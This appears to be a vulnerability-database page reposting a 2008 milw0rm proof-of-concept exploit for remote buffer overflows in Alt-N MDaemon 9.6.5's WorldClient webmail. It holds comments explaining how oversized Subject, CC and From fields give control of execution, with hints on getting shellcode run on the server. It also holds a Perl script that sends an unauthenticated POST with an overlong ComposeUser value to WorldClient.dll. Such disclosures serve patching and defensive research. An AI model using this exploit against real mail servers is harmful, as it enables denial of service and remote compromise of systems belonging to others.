Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)

🗓️ 02 Jun 2008 00:00:00Reported by securfrogType 
exploitpack
 exploitpack👁 15 Views

Alt-N MDaemon 9.6.5 - Remote Buffer Overflows on WorldClien

Code
############################################################################
# MDaemon <== v9.6.5 Multiple Remote Buffer Overflow
#
# Vendor Site: http://altn.com
#
# Risk : Highly Critical
# hehe funny bugs here .. the worldclient use the port 3000 for a webmail like (it use also an admin webmail 
# located at 
# port 1000 [by default both are opened])
# this file unfortunatly contain multiple buffer overflows , If you send a message to a user ( or postmaster ? :] )
# with a subject composed of 8194 A ( like : " Do your incomming taxes online this year, it's safe and fast,just reply with 
# the supplied incomming form...8100 A " from [email protected] etc )
# if the user click "answer" to the message , eip get owned
# the CC & From field is vulnerable too .
#
# This kind of bug is pretty nasty, because the client doesn't get owned , but postmaster yes. so if you have an account 
# on a host providing MDaemon services ,
# you can send a mail to yourself and get some shellcode executed on the server.
# if you dont ... just have a look on google,you'll find out
#
#
# this poc is another bug, actually it shouldn't work, because we dont have any cookie & session ,but it give a full control 
# over EDX without any auth, dont ask why, it's like this only for this variable [ComposeUser] =)
#
# Greetz to : French/Quebec security community & http://spiritofhack.net .
# ungreetz to : they'll reconize them =)
#
# Ps: actually this audit is NOT finished ... there might be some other remote bugs/advisory , i just dont have time for 
# this at the moment, i recommend to the ones who want to do it , to look at Webclient.exe & Webadmin.exe , there's 
# some funny stuff in there hehe .

use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 60;
my $payload2 ="b" x 20;
my $host = 'http://127.0.0.1:3000/';

my $req = HTTP::Request->new(POST => $host.'WorldClient.dll?Session=&View=Compose&ComposeInNewWindow=Yes&ChangeView=No&SendNow=Yes');
$req->content_type('application/x-www-form-urlencoded');
$req->content('ComposeUser='.$payload2.$payload1.'%40localhost&&ComposeID=1&Attn=&Company=&From=0&Reply-To=&To=%22admin+bla%22+%3Cadmin%40localhost%3E%2C+&CC=YO&BCC=&Subject=hey&Body=yo%21&');
my $res = $connect->request($req);
print $res->as_string;

# "If in time like these you can talk about individual freedom, you're probably a terrorist"

# milw0rm.com [2008-06-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jun 2008 00:00Current
0.3Low risk
Vulners AI Score0.3
mdaemonremote buffer overflowsworldclienthighly criticalwebmailvulnerabilitypoc
15